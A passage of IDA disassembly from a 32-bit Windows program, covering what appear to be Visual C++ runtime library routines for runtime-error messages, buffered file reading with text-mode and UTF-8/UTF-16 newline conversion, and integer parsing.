; sub_409217+C05j
cmp [ebp+18Ch+var_1EC], 0
jz short loc_409E49
mov eax, [ebp+18Ch+var_1F0]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_409E49: ; CODE XREF: sub_409217+C29j
mov eax, [ebp+18Ch+var_1C8]
loc_409E4C: ; CODE XREF: sub_409217+70j
; sub_409217+C1Aj ...
mov ecx, [ebp+18Ch+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
add ebp, 18Ch
leave
retn
sub_409217 endp
; =============== S U B R O U T I N E =======================================
sub_409E64 proc near ; CODE XREF: sub_403AAC+2Ap
; sub_40428D+12p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_409E70: ; CODE XREF: sub_409E64+19j
cmp ebx, dword_423C00[edi*8]
jz short loc_409E7F
inc edi
cmp edi, 17h
jl short loc_409E70
loc_409E7F: ; CODE XREF: sub_409E64+13j
cmp edi, 17h
jnb loc_409FFF
push ebp
push 3
call sub_40FA72
cmp eax, 1
pop ecx
jz loc_409FCB
push 3
call sub_40FA72
test eax, eax
pop ecx
jnz short loc_409EB3
cmp dword_423050, 1
jz loc_409FCB
loc_409EB3: ; CODE XREF: sub_409E64+40j
cmp ebx, 0FCh
jz loc_409FFE
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_427B38
push ebp
call sub_407A85
add esp, 0Ch
test eax, eax
jz short loc_409EE9
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_409EE9: ; CODE XREF: sub_409E64+76j
push 104h
mov esi, offset byte_427B51
push esi
push 0
mov byte_427C55, 0
call ds:dword_41D060 ; GetModuleFileNameA
test eax, eax
jnz short loc_409F2D
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_407A85
add esp, 0Ch
test eax, eax
jz short loc_409F2D
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_403209
add esp, 14h
loc_409F2D: ; CODE XREF: sub_409E64+A1j
; sub_409E64+B8j
push esi
call sub_4044E0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_409F72
push esi
call sub_4044E0
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_427E4C
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_40CBF6
add esp, 14h
test eax, eax
jz short loc_409F72
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
jmp short loc_409F74
; ---------------------------------------------------------------------------
loc_409F72: ; CODE XREF: sub_409E64+D4j
; sub_409E64+FBj
xor esi, esi
loc_409F74: ; CODE XREF: sub_409E64+10Cj
push offset asc_41DB20 ; "\n\n"
push ebx
push ebp
call sub_40CB3D
add esp, 0Ch
test eax, eax
jz short loc_409F94
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_409F94: ; CODE XREF: sub_409E64+121j
push off_423C04[edi*8]
push ebx
push ebp
call sub_40CB3D
add esp, 0Ch
test eax, eax
jz short loc_409FB6
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_409FB6: ; CODE XREF: sub_409E64+143j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_40F8D4
add esp, 0Ch
jmp short loc_409FFE
; ---------------------------------------------------------------------------
loc_409FCB: ; CODE XREF: sub_409E64+30j
; sub_409E64+49j
push 0FFFFFFF4h
call ds:dword_41D148 ; GetStdHandle
mov ebp, eax
cmp ebp, esi
jz short loc_409FFE
cmp ebp, 0FFFFFFFFh
jz short loc_409FFE
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:423C04h[edi*8]
push dword ptr [esi]
call sub_4044E0
pop ecx
push eax
push dword ptr [esi]
push ebp
call ds:off_41D088
loc_409FFE: ; CODE XREF: sub_409E64+55j
; sub_409E64+165j ...
pop ebp
loc_409FFF: ; CODE XREF: sub_409E64+1Ej
pop edi
pop esi
pop ebx
pop ecx
retn
sub_409E64 endp
; =============== S U B R O U T I N E =======================================
sub_40A004 proc near ; CODE XREF: sub_403AAC+23p
; sub_40428D+9p ...
push 3
call sub_40FA72
cmp eax, 1
pop ecx
jz short loc_40A026
push 3
call sub_40FA72
test eax, eax
pop ecx
jnz short locret_40A03C
cmp dword_423050, 1
jnz short locret_40A03C
loc_40A026: ; CODE XREF: sub_40A004+Bj
push 0FCh
call sub_409E64
push 0FFh
call sub_409E64
pop ecx
pop ecx
locret_40A03C: ; CODE XREF: sub_40A004+17j
; sub_40A004+20j
retn
sub_40A004 endp
; =============== S U B R O U T I N E =======================================
sub_40A03D proc near ; CODE XREF: sub_403EE2+EDp
; sub_4091DC+Fp
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_40A066
call sub_405B83
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
jmp loc_40A157
; ---------------------------------------------------------------------------
loc_40A066: ; CODE XREF: sub_40A03D+Aj
mov eax, [esi+0Ch]
test al, 83h
jz loc_40A157
test al, 40h
jnz loc_40A157
test al, 2
jz short loc_40A088
or eax, 20h
mov [esi+0Ch], eax
jmp loc_40A157
; ---------------------------------------------------------------------------
loc_40A088: ; CODE XREF: sub_40A03D+3Ej
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_40A09D
push esi
call sub_40D8AC
pop ecx
jmp short loc_40A0A2
; ---------------------------------------------------------------------------
loc_40A09D: ; CODE XREF: sub_40A03D+55j
mov eax, [esi+8]
mov [esi], eax
loc_40A0A2: ; CODE XREF: sub_40A03D+5Ej
push dword ptr [esi+18h]
push dword ptr [esi+8]
push esi
call sub_408DD0
pop ecx
push eax
call sub_40A6FF
add esp, 0Ch
cmp eax, edi
mov [esi+4], eax
jz loc_40A147
cmp eax, 0FFFFFFFFh
jz short loc_40A147
test byte ptr [esi+0Ch], 82h
jnz short loc_40A11D
push esi
call sub_408DD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40A108
push esi
call sub_408DD0
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40A108
push esi
call sub_408DD0
sar eax, 5
push esi
lea edi, ds:435820h[eax*4]
call sub_408DD0
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40A10D
; ---------------------------------------------------------------------------
loc_40A108: ; CODE XREF: sub_40A03D+9Bj
; sub_40A03D+A7j
mov eax, offset dword_423BD0
loc_40A10D: ; CODE XREF: sub_40A03D+C9j
mov al, [eax+4]
and al, 82h
cmp al, 82h
jnz short loc_40A11D
or dword ptr [esi+0Ch], 2000h
loc_40A11D: ; CODE XREF: sub_40A03D+8Fj
; sub_40A03D+D7j
cmp dword ptr [esi+18h], 200h
jnz short loc_40A13A
mov eax, [esi+0Ch]
test al, 8
jz short loc_40A13A
test ax, 400h
jnz short loc_40A13A
mov dword ptr [esi+18h], 1000h
loc_40A13A: ; CODE XREF: sub_40A03D+E7j
; sub_40A03D+EEj ...
mov ecx, [esi]
dec dword ptr [esi+4]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_40A15A
; ---------------------------------------------------------------------------
loc_40A147: ; CODE XREF: sub_40A03D+80j
; sub_40A03D+89j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
mov [esi+4], edi
loc_40A157: ; CODE XREF: sub_40A03D+24j
; sub_40A03D+2Ej ...
or eax, 0FFFFFFFFh
loc_40A15A: ; CODE XREF: sub_40A03D+108j
pop edi
pop esi
retn
sub_40A03D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A15D proc near ; CODE XREF: sub_40A6FF+9Ap
; sub_40E422+355p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push 0FFFFFFFEh
pop eax
cmp esi, eax
mov [ebp+var_14], eax
mov [ebp+var_1C], edx
jnz short loc_40A192
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_40A6FC
; ---------------------------------------------------------------------------
loc_40A192: ; CODE XREF: sub_40A15D+18j
push edi
xor edi, edi
cmp esi, edi
jl short loc_40A1A1
cmp esi, dword_435808
jb short loc_40A1C8
loc_40A1A1: ; CODE XREF: sub_40A15D+3Aj
call sub_405B96
mov [eax], edi
call sub_405B83
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 9
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A6FB
; ---------------------------------------------------------------------------
loc_40A1C8: ; CODE XREF: sub_40A15D+42j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
push ebx
lea ebx, ds:435820h[eax*4]
mov eax, [ebx]
add eax, esi
mov cl, [eax+4]
test cl, 1
jnz short loc_40A1FE
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
jmp loc_40A345
; ---------------------------------------------------------------------------
loc_40A1FE: ; CODE XREF: sub_40A15D+88j
cmp edx, edi
mov [ebp+var_10], edi
jz loc_40A6F8
test cl, 2
jnz loc_40A6F8
mov ecx, [ebp+arg_4]
cmp ecx, edi
jz loc_40A333
mov al, [eax+24h]
add al, al
sar al, 1
mov [ebp+var_2], al
movsx eax, al
dec eax
jz loc_40A32B
dec eax
jnz short loc_40A246
mov eax, edx
not eax
test al, 1
jz loc_40A333
and edx, 0FFFFFFFEh
mov [ebp+arg_8], edx
loc_40A246: ; CODE XREF: sub_40A15D+D5j
mov [ebp+var_C], ecx
loc_40A249: ; CODE XREF: sub_40A15D+216j
mov ecx, [ebx]
mov eax, [ebp+var_C]
lea edi, [esi+ecx]
test byte ptr [edi+4], 48h
jz short loc_40A2CD
mov cl, [edi+5]
cmp cl, 0Ah
jz short loc_40A2CD
xor edx, edx
cmp [ebp+arg_8], edx
jz short loc_40A2CD
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], dl
mov [ebp+var_10], 1
mov byte ptr [esi+ecx+5], 0Ah
jz short loc_40A2CD
mov ecx, [ebx]
mov cl, [esi+ecx+25h]
cmp cl, 0Ah
jz short loc_40A2CD
cmp [ebp+arg_8], edx
jz short loc_40A2CD
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], 1
mov [ebp+var_10], 2
mov byte ptr [esi+ecx+25h], 0Ah
jnz short loc_40A2CD
mov ecx, [ebx]
mov cl, [esi+ecx+26h]
cmp cl, 0Ah
jz short loc_40A2CD
cmp [ebp+arg_8], edx
jz short loc_40A2CD
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
mov [ebp+var_10], 3
mov byte ptr [esi+ecx+26h], 0Ah
loc_40A2CD: ; CODE XREF: sub_40A15D+F8j
; sub_40A15D+100j ...
push 0
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:off_41D078
test eax, eax
jz loc_40A6C2
mov edi, [ebp+var_18]
test edi, edi
jl loc_40A6C2
cmp edi, [ebp+arg_8]
ja loc_40A6C2
mov eax, [ebx]
add [ebp+var_10], edi
lea eax, [esi+eax+4]
test byte ptr [eax], 80h
jz loc_40A562
cmp [ebp+var_2], 2
jz loc_40A58C
test edi, edi
jz short loc_40A397
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 0Ah
jnz short loc_40A397
or byte ptr [eax], 4
jmp short loc_40A39A
; ---------------------------------------------------------------------------
loc_40A32B: ; CODE XREF: sub_40A15D+CEj
mov eax, edx
not eax
test al, 1
jnz short loc_40A354
loc_40A333: ; CODE XREF: sub_40A15D+BAj
; sub_40A15D+DDj
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 16h
loc_40A345: ; CODE XREF: sub_40A15D+9Cj
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
jmp short loc_40A38F
; ---------------------------------------------------------------------------
loc_40A354: ; CODE XREF: sub_40A15D+1D4j
mov eax, edx
push 4
pop ecx
shr eax, 1
cmp eax, ecx
mov [ebp+arg_8], ecx
jb short loc_40A365
mov [ebp+arg_8], eax
loc_40A365: ; CODE XREF: sub_40A15D+203j
push [ebp+arg_8]
call sub_407AEA
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz loc_40A249
call sub_405B83
mov dword ptr [eax], 0Ch
call sub_405B96
mov dword ptr [eax], 8
loc_40A38F: ; CODE XREF: sub_40A15D+1F5j
or eax, 0FFFFFFFFh
jmp loc_40A6FA
; ---------------------------------------------------------------------------
loc_40A397: ; CODE XREF: sub_40A15D+1BFj
; sub_40A15D+1C7j
and byte ptr [eax], 0FBh
loc_40A39A: ; CODE XREF: sub_40A15D+1CCj
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A480
loc_40A3B0: ; CODE XREF: sub_40A15D+306j
mov ecx, [ebp+arg_8]
mov al, [ecx]
cmp al, 1Ah
jz loc_40A46B
cmp al, 0Dh
jz short loc_40A3CD
mov [edi], al
inc edi
inc ecx
mov [ebp+arg_8], ecx
jmp loc_40A45D
; ---------------------------------------------------------------------------
loc_40A3CD: ; CODE XREF: sub_40A15D+262j
mov eax, [ebp+var_10]
dec eax
cmp ecx, eax
jnb short loc_40A3EC
lea eax, [ecx+1]
cmp byte ptr [eax], 0Ah
jnz short loc_40A3E7
inc ecx
inc ecx
mov [ebp+arg_8], ecx
loc_40A3E2: ; CODE XREF: sub_40A15D+2CAj
; sub_40A15D+2E3j
mov byte ptr [edi], 0Ah
jmp short loc_40A45C
; ---------------------------------------------------------------------------
loc_40A3E7: ; CODE XREF: sub_40A15D+27Ej
mov [ebp+arg_8], eax
jmp short loc_40A459
; ---------------------------------------------------------------------------
loc_40A3EC: ; CODE XREF: sub_40A15D+276j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_18]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:off_41D078
test eax, eax
jnz short loc_40A414
call ds:dword_41D0EC ; RtlGetLastWin32Error
test eax, eax
jnz short loc_40A459
loc_40A414: ; CODE XREF: sub_40A15D+2ABj
cmp [ebp+var_18], 0
jz short loc_40A459
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A437
cmp [ebp+var_1], 0Ah
jz short loc_40A3E2
mov byte ptr [edi], 0Dh
mov eax, [ebx]
mov cl, [ebp+var_1]
mov [esi+eax+5], cl
jmp short loc_40A45C
; ---------------------------------------------------------------------------
loc_40A437: ; CODE XREF: sub_40A15D+2C4j
cmp edi, [ebp+var_C]
jnz short loc_40A442
cmp [ebp+var_1], 0Ah
jz short loc_40A3E2
loc_40A442: ; CODE XREF: sub_40A15D+2DDj
push 1
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40D06E
add esp, 10h
cmp [ebp+var_1], 0Ah
jz short loc_40A45D
loc_40A459: ; CODE XREF: sub_40A15D+28Dj
; sub_40A15D+2B5j ...
mov byte ptr [edi], 0Dh
loc_40A45C: ; CODE XREF: sub_40A15D+288j
; sub_40A15D+2D8j
inc edi
loc_40A45D: ; CODE XREF: sub_40A15D+26Bj
; sub_40A15D+2FAj
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A3B0
jmp short loc_40A480
; ---------------------------------------------------------------------------
loc_40A46B: ; CODE XREF: sub_40A15D+25Aj
mov eax, [ebx]
lea eax, [esi+eax+4]
test byte ptr [eax], 40h
jnz short loc_40A47B
or byte ptr [eax], 2
jmp short loc_40A480
; ---------------------------------------------------------------------------
loc_40A47B: ; CODE XREF: sub_40A15D+317j
mov al, [ecx]
mov [edi], al
inc edi
loc_40A480: ; CODE XREF: sub_40A15D+24Dj
; sub_40A15D+30Cj ...
mov eax, edi
sub eax, [ebp+var_C]
cmp [ebp+var_2], 1
mov [ebp+var_10], eax
jnz loc_40A562
test eax, eax
jz loc_40A562
dec edi
mov cl, [edi]
test cl, cl
js short loc_40A4A7
inc edi
jmp loc_40A52D
; ---------------------------------------------------------------------------
loc_40A4A7: ; CODE XREF: sub_40A15D+342j
xor eax, eax
inc eax
movzx ecx, cl
jmp short loc_40A4BE
; ---------------------------------------------------------------------------
loc_40A4AF: ; CODE XREF: sub_40A15D+368j
cmp eax, 4
jg short loc_40A4C7
cmp edi, [ebp+var_C]
jb short loc_40A4C7
dec edi
movzx ecx, byte ptr [edi]
inc eax
loc_40A4BE: ; CODE XREF: sub_40A15D+350j
cmp byte_423CB8[ecx], 0
jz short loc_40A4AF
loc_40A4C7: ; CODE XREF: sub_40A15D+355j
; sub_40A15D+35Aj
mov dl, [edi]
movzx ecx, dl
movsx ecx, byte_423CB8[ecx]
test ecx, ecx
jnz short loc_40A4E4
call sub_405B83
mov dword ptr [eax], 2Ah
jmp short loc_40A55E
; ---------------------------------------------------------------------------
loc_40A4E4: ; CODE XREF: sub_40A15D+378j
inc ecx
cmp ecx, eax
jnz short loc_40A4ED
add edi, eax
jmp short loc_40A52D
; ---------------------------------------------------------------------------
loc_40A4ED: ; CODE XREF: sub_40A15D+38Aj
mov ecx, [ebx]
add ecx, esi
test byte ptr [ecx+4], 48h
jz short loc_40A51B
inc edi
cmp eax, 2
mov [ecx+5], dl
jl short loc_40A509
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+25h], dl
inc edi
loc_40A509: ; CODE XREF: sub_40A15D+3A1j
cmp eax, 3
jnz short loc_40A517
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+26h], dl
inc edi
loc_40A517: ; CODE XREF: sub_40A15D+3AFj
sub edi, eax
jmp short loc_40A52D
; ---------------------------------------------------------------------------
loc_40A51B: ; CODE XREF: sub_40A15D+398j
neg eax
cdq
push 1
push edx
push eax
push [ebp+arg_0]
call sub_40D06E
add esp, 10h
loc_40A52D: ; CODE XREF: sub_40A15D+345j
; sub_40A15D+38Ej ...
mov eax, [ebp+var_1C]
sub edi, [ebp+var_C]
shr eax, 1
push eax
push [ebp+arg_4]
push edi
push [ebp+var_C]
push 0
push 0FDE9h
call ds:dword_41D0A0 ; MultiByteToWideChar
test eax, eax
mov [ebp+var_10], eax
jnz short loc_40A585
call ds:dword_41D0EC ; RtlGetLastWin32Error
loc_40A557: ; CODE XREF: sub_40A15D+58Cj
push eax
call sub_405BA9
pop ecx
loc_40A55E: ; CODE XREF: sub_40A15D+385j
; sub_40A15D+584j
or [ebp+var_14], 0FFFFFFFFh
loc_40A562: ; CODE XREF: sub_40A15D+1ADj
; sub_40A15D+32Fj ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jz short loc_40A571
push eax
call sub_4039CF
pop ecx
loc_40A571: ; CODE XREF: sub_40A15D+40Bj
mov eax, [ebp+var_14]
cmp eax, 0FFFFFFFEh
jnz loc_40A6FA
mov eax, [ebp+var_10]
jmp loc_40A6FA
; ---------------------------------------------------------------------------
loc_40A585: ; CODE XREF: sub_40A15D+3F2j
add eax, eax
mov [ebp+var_10], eax
jmp short loc_40A562
; ---------------------------------------------------------------------------
loc_40A58C: ; CODE XREF: sub_40A15D+1B7j
test edi, edi
jz short loc_40A59E
mov ecx, [ebp+var_C]
cmp word ptr [ecx], 0Ah
jnz short loc_40A59E
or byte ptr [eax], 4
jmp short loc_40A5A1
; ---------------------------------------------------------------------------
loc_40A59E: ; CODE XREF: sub_40A15D+431j
; sub_40A15D+43Aj
and byte ptr [eax], 0FBh
loc_40A5A1: ; CODE XREF: sub_40A15D+43Fj
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A6B7
loc_40A5B7: ; CODE XREF: sub_40A15D+53Aj
mov eax, [ebp+arg_8]
movzx ecx, word ptr [eax]
cmp cx, 1Ah
jz loc_40A69F
cmp cx, 0Dh
jz short loc_40A5DC
mov [edi], cx
inc edi
inc edi
inc eax
inc eax
mov [ebp+arg_8], eax
jmp loc_40A691
; ---------------------------------------------------------------------------
loc_40A5DC: ; CODE XREF: sub_40A15D+46Ej
mov ecx, [ebp+var_10]
add ecx, 0FFFFFFFEh
cmp eax, ecx
jnb short loc_40A607
lea ecx, [eax+2]
cmp word ptr [ecx], 0Ah
jnz short loc_40A5FF
add eax, 4
mov [ebp+arg_8], eax
loc_40A5F5: ; CODE XREF: sub_40A15D+4E7j
; sub_40A15D+513j
mov word ptr [edi], 0Ah
jmp loc_40A68F
; ---------------------------------------------------------------------------
loc_40A5FF: ; CODE XREF: sub_40A15D+490j
mov [ebp+arg_8], ecx
jmp loc_40A68A
; ---------------------------------------------------------------------------
loc_40A607: ; CODE XREF: sub_40A15D+487j
add [ebp+arg_8], 2
push 0
lea eax, [ebp+var_18]
push eax
push 2
lea eax, [ebp+var_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:off_41D078
test eax, eax
jnz short loc_40A630
call ds:dword_41D0EC ; RtlGetLastWin32Error
test eax, eax
jnz short loc_40A68A
loc_40A630: ; CODE XREF: sub_40A15D+4C7j
cmp [ebp+var_18], 0
jz short loc_40A68A
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A666
cmp [ebp+var_8], 0Ah
jz short loc_40A5F5
mov word ptr [edi], 0Dh
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8]
mov [esi+eax+5], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8+1]
mov [esi+eax+25h], cl
mov eax, [ebx]
mov byte ptr [esi+eax+26h], 0Ah
jmp short loc_40A68F
; ---------------------------------------------------------------------------
loc_40A666: ; CODE XREF: sub_40A15D+4E0j
cmp edi, [ebp+var_C]
jnz short loc_40A672
cmp [ebp+var_8], 0Ah
jz short loc_40A5F5
loc_40A672: ; CODE XREF: sub_40A15D+50Cj
push 1
push 0FFFFFFFFh
push 0FFFFFFFEh
push [ebp+arg_0]
call sub_40D06E
add esp, 10h
cmp [ebp+var_8], 0Ah
jz short loc_40A691
loc_40A68A: ; CODE XREF: sub_40A15D+4A5j
; sub_40A15D+4D1j ...
mov word ptr [edi], 0Dh
loc_40A68F: ; CODE XREF: sub_40A15D+49Dj
; sub_40A15D+507j
inc edi
inc edi
loc_40A691: ; CODE XREF: sub_40A15D+47Aj
; sub_40A15D+52Bj
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A5B7
jmp short loc_40A6B7
; ---------------------------------------------------------------------------
loc_40A69F: ; CODE XREF: sub_40A15D+464j
mov ecx, [ebx]
lea esi, [esi+ecx+4]
test byte ptr [esi], 40h
jnz short loc_40A6AF
or byte ptr [esi], 2
jmp short loc_40A6B7
; ---------------------------------------------------------------------------
loc_40A6AF: ; CODE XREF: sub_40A15D+54Bj
mov ax, [eax]
mov [edi], ax
inc edi
inc edi
loc_40A6B7: ; CODE XREF: sub_40A15D+454j
; sub_40A15D+540j ...
sub edi, [ebp+var_C]
mov [ebp+var_10], edi
jmp loc_40A562
; ---------------------------------------------------------------------------
loc_40A6C2: ; CODE XREF: sub_40A15D+187j
; sub_40A15D+192j ...
call ds:dword_41D0EC ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_40A6E6
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
mov [eax], esi
jmp loc_40A55E
; ---------------------------------------------------------------------------
loc_40A6E6: ; CODE XREF: sub_40A15D+570j
cmp eax, 6Dh
jnz loc_40A557
and [ebp+var_14], 0
jmp loc_40A562
; ---------------------------------------------------------------------------
loc_40A6F8: ; CODE XREF: sub_40A15D+A6j
; sub_40A15D+AFj
xor eax, eax
loc_40A6FA: ; CODE XREF: sub_40A15D+235j
; sub_40A15D+41Aj ...
pop ebx
loc_40A6FB: ; CODE XREF: sub_40A15D+66j
pop edi
loc_40A6FC: ; CODE XREF: sub_40A15D+30j
pop esi
leave
retn
sub_40A15D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A6FF proc near ; CODE XREF: sub_403EE2+C9p
; sub_40A03D+73p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_421900
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A72E
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
loc_40A726: ; CODE XREF: sub_40A6FF+5Cj
or eax, 0FFFFFFFFh
jmp loc_40A7CB
; ---------------------------------------------------------------------------
loc_40A72E: ; CODE XREF: sub_40A6FF+12j
xor edi, edi
cmp eax, edi
jl short loc_40A73C
cmp eax, dword_435808
jb short loc_40A75D
loc_40A73C: ; CODE XREF: sub_40A6FF+33j
; sub_40A6FF+7Cj
call sub_405B96
mov [eax], edi
call sub_405B83
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
jmp short loc_40A726
; ---------------------------------------------------------------------------
loc_40A75D: ; CODE XREF: sub_40A6FF+3Bj
mov ecx, eax
sar ecx, 5
lea ebx, ds:435820h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A73C
push eax
call sub_40F19E
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A7A6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40A15D
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A7A6: ; CODE XREF: sub_40A6FF+8Fj
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A7BC: ; CODE XREF: sub_40A6FF+A5j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A7D1
mov eax, [ebp+var_1C]
loc_40A7CB: ; CODE XREF: sub_40A6FF+2Aj
call __SEH_epilog4
retn
sub_40A6FF endp
; =============== S U B R O U T I N E =======================================
sub_40A7D1 proc near ; CODE XREF: sub_40A6FF+C4p
; DATA XREF: fabskl8p:00421918o
push dword ptr [ebp+8]
call sub_40F23E
pop ecx
retn
sub_40A7D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7DB proc near ; CODE XREF: sub_40AA06:loc_40AA25p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_402AEB
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40A7FC
mov [eax], esi
loc_40A7FC: ; CODE XREF: sub_40A7DB+1Dj
cmp esi, edi
jnz short loc_40A82C
loc_40A800: ; CODE XREF: sub_40A7DB+5Aj
; sub_40A7DB+60j
call sub_405B83
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40A825
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A825: ; CODE XREF: sub_40A7DB+41j
xor eax, eax
jmp loc_40AA02
; ---------------------------------------------------------------------------
loc_40A82C: ; CODE XREF: sub_40A7DB+23j
cmp [ebp+arg_C], edi
jz short loc_40A83D
cmp [ebp+arg_C], 2
jl short loc_40A800
cmp [ebp+arg_C], 24h
jg short loc_40A800
loc_40A83D: ; CODE XREF: sub_40A7DB+54j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40A849: ; CODE XREF: sub_40A7DB+A5j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40A869
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40CDF4
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40A879
; ---------------------------------------------------------------------------
loc_40A869: ; CODE XREF: sub_40A7DB+75j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40A879: ; CODE XREF: sub_40A7DB+8Cj
test eax, eax
jz short loc_40A882
mov bl, [edi]
inc edi
jmp short loc_40A849
; ---------------------------------------------------------------------------
loc_40A882: ; CODE XREF: sub_40A7DB+A0j
cmp bl, 2Dh
jnz short loc_40A88D
or [ebp+arg_10], 2
jmp short loc_40A892
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A7DB+AAj
cmp bl, 2Bh
jnz short loc_40A895
loc_40A892: ; CODE XREF: sub_40A7DB+B0j
